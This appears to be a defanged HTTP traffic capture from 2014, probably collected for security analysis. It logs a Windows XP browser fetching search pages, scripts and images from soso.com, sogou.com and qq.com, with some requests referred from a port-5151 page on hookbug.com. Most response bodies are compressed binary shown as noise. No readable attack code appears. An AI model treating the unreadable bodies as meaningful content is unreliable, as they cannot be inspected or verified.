....7/.....//N..J.ooo..G.#...6d.W...h..\..\T......o..M=..*T^.v;m..
<<< skipped >>>

GET /js/sugg_ajaj_soso.v.1.0.js HTTP/1.1


Accept: */*
Referer: hXXp://VVV.soso.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.soso.com
Connection: Keep-Alive
Cookie: SUID=26266BB86914920A0000000053B9B257


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:25 GMT
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Wed, 18 Jun 2014 15:23:35 GMT
Set-Cookie: IPLOC=CA; expires=Mon, 06-Jul-15 20:32:25 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Tue, 05 Aug 2014 20:32:25 GMT
Cache-Control: max-age=2592000
Content-Encoding: gzip
11b3...............V...W........n.....R(..h..-7g.....c.?x4....I..<.
..mj.F..h..WD.<...,.....}................yE.xx.F.f.$....G'..'$r....
..]d,.>..v...........f.";...WO....q.R......Af~%.t>...)...n.| n&l
t;*.@..#......\ ..f..0J.<p..P..E3.....o.y.>..f..P..n1.....&...8.
O.g..e.8. ...S....e..I.e.g..fN......K..L..`.1......3....3.au.:D..H....
..N.c...o.=....G...fvqj..w......}.%.yK......I...9..04.C..&e&....2/.l..
?.0.Gp.&.E.s.I.'.K>.|...!.=\.I.H...:...D...z.........B=............
.V....b....N}X........./..P.....E/uX...H.........".{9sajQc~..&...wE.r.
.....?..^..,b.....kM.....<wFc..kq..8.E..5....%.{.z..L7.:S...r{.L.f.
.X...;....E..... [email protected]......!./]kQW....i.<O.....V.......fj.E.g.
I].\..,.......(.&q.'..aj..3..8..........`.`.....eD..t.N.l..'h....k]...
<...J.X..[Dk%w'..n.;............9N.1\O}...#Z..b,.f.H.(WQ...7T.R.._.
5......*..&.H.H.k . ..No.;].1.../8..........tT........tD`.}.D:.Q..?ua.
`X7.1....E..4..%.6...p....(@.=...l?.......M{.../.)k.q/~b.........E.^X.
S./....4q.>[email protected]........".A.....T<.P.....Mcp..N"..X.'.E..
.........g........w..;*.M...u...aC.].............u.-.n.`...Y.&C..8k-O&
lt;.n>...r..-.._Q.U.H...4.d.>f.?.I..r.....@[email protected]_..t\J."C.
?.j.Xx.....!...t..m.3=8.M..r.'`..X.Uq}Q......R......Q..`.. 8.<.i..9
...^G......J...yv../_..}"DF.G.!.........!..w.....B....G....=tm.7....B.
J.a.../..!.'c.I.Cu.A9.....!.Z.a._$.............X.4~dG`..N..!.X\@v.....
....k.(...M..wE.-..,r...A..1.D...s.N.]..N).!_..!.....$C4.8.l...$,rk6.u
. sN.0.<v>W..':....m... P.x.<.5.:.>Y.X,...IfF..j!."H_.
<<< skipped >>>


GET /qconn/wpa/button/button_10.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.hookbug.com:5151/qq.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: pub.idqqimg.com


HTTP/1.1 200 OK
Server: NWS_UGC_HY
Connection: keep-alive
Date: Sun, 06 Jul 2014 20:32:23 GMT
Cache-Control: max-age=2592000
Expires: Tue, 05 Aug 2014 20:32:23 GMT
Last-Modified: Mon, 08 Apr 2013 03:15:19 GMT
Content-Type: image/gif
Content-Length: 2997
X-Cache-Lookup: Hit From Disktank
GIF89aM..........me.{l...............`u.jmt......n..sv|.i].c\.....n...
?Xf......nqy~...rf..qSiv.......................t...............y|....@
Yg.~t.....kv..efm.....................Nes......cdn)FVz.....s.......WQT
V._\.i`......'EUdx.`bl*GW^t.dejcdj^`h......<Ve...............;Ud...
......=We|..................2E........................................
....................>Wf.........w..(EV...............r.............
..................................[r........................V.mh......
w{..~m.._......iei..~..s.qh.pn..U.....^...............udh.............
....................gini....x..~...........X......ebk..q.......ub.zh..
.....WX.......fa.ib.ed..p..w..q..e...sv....ty...[.....U.sj..j..v.mkhjs
............sqv........^..k........a.k]...kn{.........................
.................!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehi
HzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
dobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <
;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> &
lt;rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1
.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" x
mlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.
did:E41382F2429BE211A018AF641D24CE9C" xmpMM:DocumentID="xmp.did:8AF3F4
679FFA11E2AFECC3046E5C8B96" xmpMM:InstanceID="xmp.iid:8AF3F4669FFA11E2
AFECC3046E5C8B96" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> 
<xmpMM:DerivedFrom stRef:instanceID="xmp.iid:25F0FBA9669BE211A0
<<< skipped >>>


GET /pv.gif?uigs_productid=web&uigs_t=1404660989708240&uigs_cookie=SUID=26266BB86914920A0000000053B9B257&uigs_uuid=1404660989708379&scrnwi=1024&scrnhi=768&uigs_pbtag=A&abtestid=0&query=%C2%BE%C2%A2%C3%8E%C3%A8%C3%90%C2%A6%C3%90%C2%A6&rn=25687&stype=2&htn=1&qcn=0&hbn=0&uuid=6be69b4a-b962-42eb-8324-0d6d8e367010&vr=null_0-null_1-null_2-30000909_3-30000909_4-null_5-null_6-null_7-null_8-null_9&exp_id=null_0-null_1-null_2-null_3-null_4-null_5-null_6-null_7-null_8-null_9&exp_id_list=0_0&exp_status=0&vrdetail=null_0-null_1-null_2-30000909_3-30000909_4-null_5-null_6-null_7-null_8-null_9&sm=d0_0-d0_1-d0_2-d0_3-d0_4-d0_5-d0_6-d0_7-d0_8-d0_9&msrc=sm&loc=CA&adn=0&adltbn=null&adltan=0&radn=0&qflag=0&qtype=0&warnLevel=127&leadtest=-1&eg=1&cost=116&bl=-1_127_0_0&pid=sogou-wsse-142c65e00f4f7cf2&qjf=sogou-wsse-142c65e00f4f7cf2&servuri=%2Fwebsearch%2Fsoso.jsp&rw=&idc=cnc&pn=10&jhhint=0&jhshuxing=0&intcat=web&inttab=61-0_40-1_28-2_41-3_39-4_43-5_9-6_29-7_30-8_45-9_62-10_&jhly=top&jhlysite=all-0_sohu.com-1_focus.cn-2_docin.com-3_&legalad=1&googlead=0&uigs_version=v1.1&uigs_refer=http://VVV.soso.com/ HTTP/1.1
Accept: */*
Referer: hXXp://VVV.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢ÎèЦЦ
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pb.sogou.com
Connection: Keep-Alive
Cook
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:30 GMT
Content-Type: text/xml
Content-Length: 0
Connection: keep-alive
Set-Cookie: SUV=007111CEB86B262653B9B25EE700A038; expires=Wed, 03-Jul-24 20:32:30 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
....


GET /pv.gif?uigs_productid=webapp&type=tmon&uuid=6be69b4a-b962-42eb-8324-0d6d8e367010&loc=CA&abtestid=0&query=%C2%BE%C2%A2%C3%8E%C3%A8%C3%90%C2%A6%C3%90%C2%A6&eg=1&cost=116&idc=cnc&vr=null_0-null_1-null_2-30000909_3-30000909_4-null_5-null_6-null_7-null_8-null_9&h_s=1404660985943&h_e=1404660986568&b_e=1404660988755&a_e=1404660990302&w_l=1404660990333 HTTP/1.1


Accept: */*
Referer: hXXp://VVV.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢ÎèЦЦ
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pb.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=CA; SUID=26266BB86914920A0000000053B9B257; SUV=007111CEB86B262653B9B25EE700A038


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:30 GMT
Content-Type: text/xml
Content-Length: 0
Connection: keep-alive



GET /pa?p=2:1848168177:41 &r=0.6772223338484764 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.hookbug.com:5151/qq.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: wpa.qq.com
Connection: Keep-Alive


HTTP/1.1 301 Moved Permanently
Server: tws
Date: Sun, 06 Jul 2014 20:32:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Location: hXXp://pub.idqqimg.com/qconn/wpa/button/button_10.gif
Pragma: no-cache
Cache-Control: no-cache; must-revalidate
0..



GET /net/a/04/link?&url=http://VVV.pvc123.com/skin/pvc/image/company.jpg&appid=100520072&referer=hXXp://VVV.pvc123.com/b-p765576731/ HTTP/1.1
Accept: */*
Referer: hXXp://VVV.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢ÎèЦЦ
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img02.store.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=CA; SUID=26266BB86914920A0000000053B9B257


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:29 GMT
Content-Type: image/jpeg
Content-Length: 4669
Connection: keep-alive
X-Powered-By: PHP/5.3.3
ETag: 355492bcc18e8674a0bc7cd191018b4e
Expires: Tue, 05 Aug 2014 15:39:13 GMT
Cache-Control: max-age=2592000
Last-Modified: Sun, 06 Jul 2014 15:39:13 GMT
......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), qu
ality = 95....C.......................................................
.............C........................................................
...............x.x..".................................................
...........}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:C
DEFGHIJSTUVWXYZcdefghijstuvwxyz.......................................
......................................................................
.................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*
56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz................................
....................................................?........L.I@...H.
To:.2...\.M.\.h...v...?...;...............QMV$..uP..(...(...(...(..l..
........ .W...2..6#..9...z..6..y..,a.H.....h.f.A.C......a..."..u.}....
....s...&.._V4....W..".o......&..`kCE...w.h.:.h......q....&.C.)...].y.
....8.5#.yR......Z.\.....4r..".......F.,.&..sq$..-A.2}6......s_.....0p
....>Z.7J...-.Q].AE.P.E.P.E.P.6_..j...]M@...<'e....^..."..Z. r..
....../~*......o....d.......,.yY..V.?. .ze.ww...?...........?..R....3S
.b..>G.m..{..}......s.UiMB.6..k.....r...#..}..h........q....|Q.X..N
.RK..%.A. .wn....O.=..A%..r.....O......b........>.....W.]'.'.G.mt.;
W...m...?.fO...pX.2O....X\.aW...2..v....n..bq8jxg:J....}..2|8..U..K...
...[O....9....!..5.y.......4....x.K.v.)m......u......}....\._.........
....6P..A8........I...F.P.....g....4..z....(......?j...J.....Kr..1y...
.2F.~..i..~.j.Kmq...I...Awv...pp.dq].l./.F2.E. .....E.h...#.....q|
<<< skipped >>>


GET /images/btn_del.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢ÎèЦЦ
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.soso.com
Connection: Keep-Alive
Cookie: SUID=26266BB86914920A0000000053B9B257; SUV=1404660986458226; SNUID=BFBCF1229A9E6415DB3310AF9AEB7C29


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:27 GMT
Content-Type: image/gif
Content-Length: 1286
Connection: keep-alive
Last-Modified: Wed, 18 Jun 2014 15:22:42 GMT
Set-Cookie: IPLOC=CA; expires=Mon, 06-Jul-15 20:32:27 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
ETag: "53a1aec2-506"
Expires: Tue, 05 Aug 2014 20:32:27 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GIF89a................................................................
.......................................!..XMP DataXMP<?xpacket begi
n="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adob
e:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:
56:27        "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22
-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http:
//ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/"
 xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:Crea
torTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:0DC8
9FA742CA11E3911B860E70DCA297" xmpMM:DocumentID="xmp.did:0DC89FA842CA11
E3911B860E70DCA297"> <xmpMM:DerivedFrom stRef:instanceID="xmp.ii
d:0DC89FA542CA11E3911B860E70DCA297" stRef:documentID="xmp.did:0DC89FA6
42CA11E3911B860E70DCA297"/> </rdf:Description> </rdf:RDF&g
t; </x:xmpmeta> <?xpacket end="r"?>.......................
......................................................................
.....................................~}|{zyxwvutsrqponmlkjihgfedcba`_^
]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;:9876543210/.-, *)('&%$#"! ..
...............................!.......,..........g.$JL.L..0c..0......
0..=30C`.Z.......,.....k8.LG.v.Y#.mlp.........Q..L.n|.S [email protected].<=
2#6.94.>4"%'.q,#!.;....
<<< skipped >>>

GET /images/ico_src.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢ÎèЦЦ
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.soso.com
Connection: Keep-Alive
Cookie: SUID=26266BB86914920A0000000053B9B257; SUV=1404660986458226; SNUID=BFBCF1229A9E6415DB3310AF9AEB7C29


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:27 GMT
Content-Type: image/png
Content-Length: 8524
Connection: keep-alive
Last-Modified: Wed, 18 Jun 2014 15:22:42 GMT
Set-Cookie: IPLOC=CA; expires=Mon, 06-Jul-15 20:32:27 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
ETag: "53a1aec2-214c"
Expires: Tue, 05 Aug 2014 20:32:27 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR...Y...t......9.G....pHYs................MiCCPPhotosho
p ICC profile..x..SwX...>..e.VB....l.."#[email protected]..
..H....(.gA..Z.U\8.....}z............y.....&...j.9R.<:...OH......H.
. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....
ly|B"......I>..................(G$.@..`U.R,......@"......Y.2G.....v
.X..@`...B,.. 8..C.... L..0...._p..H.......K.3.....w....!..l.Ba.).f.."
...#.H..L.........8?......f.l.....k.o">!.........N..._....p...u.k.[
..V.h..][email protected].<......%b..0..>[email protected].@...
...qanv.R....B1n..#......)..4.\,...X..P"M.y.R.D!......2......w....O.N.
...l.~.....X.v.@~.-......g42y.......@ ...........\...L....D..*.A......
........a.D@.$.<.B........A.T.:.............18....\..p..`........A.
..a!:..b.."......"aH4... ...Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u
@.......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v..
..a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._
.H$....N.!%.2I.IkH.H-.S.>..i.L&..m....... ......O.......:...L..$R..
.J5e?....2B...Q.......:.ZIm.vP/S...4u.%...C..-....igi.h/.t.....E....k.
......w......Hb(.k.{...../.L......T0.2..g...oUX*.*|.....:.V.~...TUsU?.
y..T.U..^V}.FU.P.........U..6..RwR.P.Q_.._...c....F..H.Tc....!..2e.XB.
rV..,k.Mb[...Lv...v/{LSCs.f.f.f..q.......9..J.!...{-.-?-..j.f.~.7.z...
b.r......up.@.,..:m:.u..6.Q....u..>.c.y.........G.m..........704.6.
.l18c...c.k.i........h...h..I.'.&..g.5x.>f.o.b.4.e.k<abi2.......
)..k.f....t...,.......9..k.a........E..J.6.....|...M....V>VyV.V
<<< skipped >>>

GET /js/jquery-1.6.min.js HTTP/1.1


Accept: */*
Referer: hXXp://VVV.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢ÎèЦЦ
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.soso.com
Connection: Keep-Alive
Cookie: SUID=26266BB86914920A0000000053B9B257; SUV=1404660986458226; SNUID=BFBCF1229A9E6415DB3310AF9AEB7C29


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:28 GMT
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Wed, 18 Jun 2014 15:23:35 GMT
Set-Cookie: IPLOC=CA; expires=Mon, 06-Jul-15 20:32:28 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Tue, 05 Aug 2014 20:32:28 GMT
Cache-Control: max-age=2592000
Content-Encoding: gzip
984......................<..h.......L.6..% r.e;..'.M..F...d.%7..e.e
.l..VU...[J...'j..._.......?Z.[................[...6.....? .t.......2v
...G...l...-&.}.....j.e=].~.w.._......H....Z7.,........7.......o.=....
.....uO.\o'=.Y...*].d.......E....R;N..LGOz....|=[.^..S..:.l?..<>
..j}...j...;...M.c.... ....#..........7.:.........?.Y.h..U....Vz....6.
.lW.q...R..5..q.wW.,..q.GQ..A...q|.....o.......j/%.....u.Z...N..x.....
.$......;.S/...M....}/[email protected];....f.SR?.n...}..}.,.^x..*...~....8..
...n..i..].K.....m........7.-MkD..E...a.cU....E't..M.EF.r..tv8.)s.. .E
>........Ly.No8c7.O*.uo..>.IhS......t.\<.B.O.z...0...T.......
.fo....r...d.....(Qv.......d.`......w.8.....K.=.^|..#EI;........1Z..~Z
.FQ|......-....IzGI.|..X.....n.EYtM.[......*..~4.w........}....YN..{U.
..n=.w.....o......=...xt*.7U.2t.........._i.....F.._..}.=;...M.S%.8JA.
..fQ..S9.....*....W..T..<...#.PK.Rk....[..].'WE.......I...e.*V.kZ..
......c.qkJge.....G}....~...6.>#x...JN..t.....[..p..8l..`.-..b..(m.
...3<...e..x-.3W.(..G.C>..#..h...M.....g....u.vjA......h....p.Oh
......r$.su..nM...ZS...`.m..?..W..N......k......3...-5...n.p.....%...S
B...2....~M}.....L..`..A..........N.a7.L.O...p.S..zO.m..6k../.|....Xr.
..34..'C.........A...r.....ww.b...E .%T`J./.$.5.K.I..Y7.2.......9.....
:[email protected]...=...N..{....3....A_.Y.G.%w..Lp...m8{..5....C.k..P.G..f.A
_naF.i-..Ki:1.0"..F.../@1Y.t.P...m...o..ZR..D.~L......._F.. D=.o.u|}..
.zk./...j.`....:..S9.K....vzv.....bqv. J..x.y.`...6.su.0.q.R_.....?e.Q
.c5.%..Xs...C&..p....G.....&.7.9.j.M.S.x..:.16.k..../.f..hU...(.x.
<<< skipped >>>

GET /js/pb_v.min.1.9.js HTTP/1.1


Accept: */*
Referer: hXXp://VVV.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢ÎèЦЦ
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.soso.com
Connection: Keep-Alive
Cookie: SUID=26266BB86914920A0000000053B9B257; SUV=1404660986458226; SNUID=BFBCF1229A9E6415DB3310AF9AEB7C29


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:29 GMT
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Wed, 18 Jun 2014 15:23:35 GMT
Set-Cookie: IPLOC=CA; expires=Mon, 06-Jul-15 20:32:29 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Tue, 05 Aug 2014 20:32:29 GMT
Cache-Control: max-age=2592000
Content-Encoding: gzip
6f8..............ko.6..........0.V.C~..5].&....,.6WY.(.i....H..d.N....
 &..{...f..i.5.......kD...Cc.q....7tALd......3..K~i_{|n.8..3_zQ./L$..r
.(..A.g..q...wJl.....S..z.'6.i..2.#...~.p. .O..#....k.Y.w..........o.N
.'...7C..z4.i<.3.....rP.....a..?&$.6.....)g4......!.f|~..?0..ytJ..F
.|l.9Oz''.. (63:.KJGm..6.<.....`dJ.#.m.e4.h..u.sBgs...?...%qJ..z.$.
.....I....8:3P....A..d..S.#4... .K.yK:.x..,%......_.....;.f...:....$..
.....bC.......<.C.e.{.......c.........../..&6 N..F$.7o..%n......b.i
.Rn....i.L..Qc...........C..2.ac...F....6.uu.z.v.F.h..BkeE..q@n.\..E.G
..0...?C.O<[email protected].=.r..........XN.d.kt.i.....v@...~U.
m..-....5...8....X....]....'*2.~.2......X.."*(.....D.).7.o.....S$...d.
UF.N...K.Rp..^m....D^.\........T1W<....je.M,VkVNs.p.d.jt......j....
..[..\.....a..R.=r....d....q...[P.LTv.X...j..t....z:z.mp.......X%.-...
.....t...g ...YC...........4.9..J..D|m......&}.......1.6....?x=......;
bX..a....#.)...x.$...*[email protected]..'q.....TC>...K..
".."...{.....3.^.Kr.PpW..Gq..k.`V...y......H..B(@..........!...!..!..v
.I.\.2...._........{-S....>,).z.P.S9.:...5.....: WA.9.6.{..qU.o....
...R2x...3.R....WL......b.0...Q..O*..S..]..`:.....f.../..u..T.........
.e.l.b!.Q7BV....*9.....:w....R./.=N.Fm]Hdm..e.)'D.q.i...I...k....#@K..
c..v.@........{.....m.^.(....~..."...&..>o9..Y..j.,.!}s..t.......2.
vT..^x..*[email protected];..T ...En.hl..z..[./g1........z.VkdO2....
;.F.<P....,e..g(W....i.G.U.M.}.G6...s_/z#...........?..............
.{X.'._...'oAl..&.aC/.ec....N.R...x6.....02.....|2..Z.`..p%=.....D
<<< skipped >>>


GET /soso/images/icon_index.png HTTP/1.1
Accept: */*
Referer: hXXp://VVV.soso.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.soso.com
Connection: Keep-Alive
Cookie: SUID=26266BB86914920A0000000053B9B257


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:24 GMT
Content-Type: image/png
Content-Length: 3310
Connection: keep-alive
Last-Modified: Wed, 18 Jun 2014 15:19:23 GMT
Set-Cookie: IPLOC=CA; expires=Mon, 06-Jul-15 20:32:23 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
ETag: "53a1adfb-cee"
Expires: Tue, 05 Aug 2014 20:32:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR...d...x.....3(......PLTE.......~.......E..v.....'....
.......S...............~..s..v.......L..f.......................M.....
h.....&.....M..;...~..........m......x........|.P........N...z....A...
...}.^..U...........F...{................X......y...........}.....}...
....]..G...y..........................|..........5..............0.....
.|....5.........v...........z.........................................
.....................|.>...........P................. .............
.............-....................... ....................,........P..
....t...........z..|...........{........}..~..~..}..~.............[...
......}.....~....$......|..~.,..v...}.P..:.........~.".........|.e..'.
[email protected]......}.........................H...........
...J......................................1.!.....tRNS.@..f....IDATx^.
.5.$I.E..........353.- z..,...U...%....4.l.6.c...P..m...pF.M.w..aK.z(.
h.J.BH.!...B<..:.CC...C,....0.-3..e.......hA.P..ai..=P...?....:b[.j
.y!a.........?>...T.3..E...nvpe.....k.........z......=.a(..-U..W...
......z....}..P;..l.}..l^fY.G!..&C.Rp....W...9...QH s...].?....jU_)u.P
.B.sBh.W/o......mUY..(.X......-.w.n....{."h..{.RhWJ.z..U....(....Y..!^
..V..i'....&nhMN.K.|(.....a.G!..,..\j..{..{.}..C=..\...p.XN6/.....q)..
.x.....W.W...a..../..P.B,x .....I...._~.t.......mA..7..<..<..(D.
. ....S..MF.....j4.Bh...`h..`...1.`G..M,[email protected]<
.4.v.%.Yl4.5......9Vi ..0<e.B...DR...l..N..aK...X.........6...X.. .
.<@......Uz....a...4?G..>L.F..%R\...*fMU5U.Hw.x.(.Ak.H.....7
<<< skipped >>>

GET /q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢ÎèЦЦ HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://VVV.soso.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.soso.com
Connection: Keep-Alive
Cookie: SUID=26266BB86914920A0000000053B9B257


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:25 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: SNUID=BFBCF1229A9E6415DB3310AF9AEB7C29; expires=Wed, 16-Jul-14 20:32:25 GMT; path=/
Set-Cookie: IPLOC=CA; expires=Mon, 06-Jul-15 20:32:25 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
set-cookie: ld=NwFoPlllll2FmbJBlllllVni7O6lllllmp7uJkllll9lllllxoER$5@@@@@@@@@@; path=/; expires=Tue, 05 Aug 2014 20:32:25 GMT; domain=.sogou.com
Cache-Control: max-age=0
Expires: Sun, 06 Jul 2014 20:32:25 GMT
Content-Encoding: gzip
4e7.............V.n.F....?04.X._.l."%..l...6h.$].C...f.ag.,9.6..v.E.-.
................etY.....;w.9......;.b2............GO.O..v......M...G..
5......9b.{..i.)@...|>w.}....~....#.q......#=.>......2t.M.......
~.....@@CFL#.9.......9N..'hR...W.f...T..F."!..g..'...;#.......x.......
.....o....??.CY.v....?....|.........cU...Z..%...0......dn.! .......L..
..w.4*.2.)..#.S>.....z..xf%....)..P..y.r.E.f... U.s).$...AZb*...|.3
..;d<z..K"b..~J1&yP..8........MsL.~7..Hh........-.A..&.W...O.q0....
.B..N.....8..?..x..P_AURJh.......b......j....y^0O).[.("~.E...ba..a..].
..U.$D.../[email protected]..)...<..y..p.......z.......uF..4J.
n.....<.....S....<Ur.....~......DJ.}.)..b.3.R.;....O...o.7..#.;.
..^5.T.r..Yn.|.....&.@. ..^K..o.f.a.$.....lJo.......&....3......\.....
.....4..9..;...)..{.|.!...=.....T62....{.y...6U....?R{.TVO.P.u3..P.V@.
3......m.J..:y..n..E....-...G.........r4K6.B7...h3.....I.<MYM.h..1.
[email protected]........  ..(......-..l.^.f...Q....A...'.>... ...JD
D.j.r..n......Mk...7.u.e.....By.......o.......j....Q....$5...j...a...o
o.>.9...f....ufC.G..........1.1.......7..r....~..mT..:.k....;.g.W..
